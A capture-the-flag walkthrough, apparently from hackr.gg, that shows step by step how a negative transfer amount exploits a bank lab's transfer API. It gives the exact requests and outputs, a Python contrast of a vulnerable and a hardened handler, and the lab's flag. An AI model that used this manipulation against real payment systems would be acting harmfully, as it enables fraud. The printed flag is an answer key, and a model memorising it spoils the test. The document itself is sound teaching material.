hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Transfer Funds — FirstBank

Business Logic Flaws · Negative Value / Business Logic Bypass
Difficulty: Intermediate
Vuln class: Negative Value / Business Logic Bypass
Steps: 4
// Objective
Exploit FirstBank's transfer API by sending a negative amount — causing the system to add funds to your account instead of deducting them.
// Tools required
Browser, Developer Tools, Burp Suite, curl
// Step-by-step walkthrough
Step 1: Perform a normal transfer
Log in and navigate to Transfer Funds. Send $1 to account 99999 and observe the request.
Command / Input
POST /api/transfer
Content-Type: application/json

{"from":"20001","to":"99999","amount":1}
Output
{"status":"success","newBalance":999}
Step 2: Understand the vulnerability
The server deducts the amount from the sender and adds it to the recipient. If the server does not validate that amount > 0, a negative number reverses the direction — it adds funds to the sender and deducts from the recipient.
This is a classic business logic flaw. The server-side code likely does:
balance[from] -= amount;
balance[to] += amount;
With amount = -100, this becomes: the sender (from) gains 100 and the recipient (to) loses 100.
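To make the flaw and its fix concrete, here is an added example (not FirstBank's or hackr.gg's code) of a transfer handler written the way step 2 describes, beside a hardened version that rejects non-positive, non-integer, self-directed and unfunded transfers at the request boundary. Account numbers and starting balances are constructed to match the walkthrough's figures; whole dollars are used to keep the arithmetic readable.

```python
import json
from typing import Dict


class TransferError(ValueError):
    """Raised when a transfer request fails validation."""


def transfer_vulnerable(balances: Dict[str, int], src: str, dst: str, amount: int) -> dict:
    # The flawed logic from step 2: no check on the sign of amount, so a
    # negative value silently reverses the direction of the transfer.
    balances[src] -= amount
    balances[dst] += amount
    return {"status": "success", "newBalance": balances[src]}


def transfer_hardened(balances: Dict[str, int], src: str, dst: str, amount) -> dict:
    # Accept only a plain int. bool is an int subclass in Python, so exclude it
    # explicitly; floats and numeric strings are rejected rather than coerced.
    if isinstance(amount, bool) or not isinstance(amount, int):
        raise TransferError("amount must be an integer")
    if amount <= 0:
        raise TransferError("amount must be positive")
    if src == dst:
        raise TransferError("source and destination must differ")
    if src not in balances or dst not in balances:
        raise TransferError("unknown account")
    if balances[src] < amount:
        raise TransferError("insufficient funds")
    # In a real service both updates run inside one database transaction so a
    # concurrent request cannot observe or exploit the half-applied state.
    balances[src] -= amount
    balances[dst] += amount
    return {"status": "success", "newBalance": balances[src]}


def handle_transfer_json(balances: Dict[str, int], body: str) -> dict:
    # Request boundary: parse a JSON body shaped like the walkthrough's and
    # apply the hardened handler, turning validation failures into an error.
    try:
        req = json.loads(body)
        return transfer_hardened(balances, req["from"], req["to"], req["amount"])
    except (TransferError, KeyError, ValueError, TypeError) as exc:
        return {"status": "error", "reason": str(exc)}


def fresh_ledger() -> Dict[str, int]:
    # Constructed starting balances chosen to reproduce the walkthrough's numbers.
    return {"20001": 1000, "99999": 0}


if __name__ == "__main__":
    print(transfer_vulnerable(fresh_ledger(), "20001", "99999", -500))
    print(handle_transfer_json(fresh_ledger(), '{"from":"20001","to":"99999","amount":-500}'))
```

Running it prints the reversed transfer from the vulnerable handler (balance grows to 1500) and an error response from the hardened one, with the ledger left untouched.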
Step 3: Send a negative amount
Intercept the transfer request and change the amount to a negative number.
Command / Input
POST /api/transfer

{"from":"20001","to":"99999","amount":-500}
Output
{"status":"success","newBalance":1500}
Your balance increased by $500 instead of decreasing. The transfer ran in reverse.
Step 4: Retrieve the flag
After a successful negative transfer, the flag appears in the transaction confirmation or your account dashboard.
Output
HackrGG{f1rstb4nk_n3g4t1v3_tr4nsf3r}
// Flag
Flag value: HackrGG{f1rstb4nk_n3g4t1v3_tr4nsf3r}
Displayed in the transaction confirmation after the negative-amount transfer succeeds.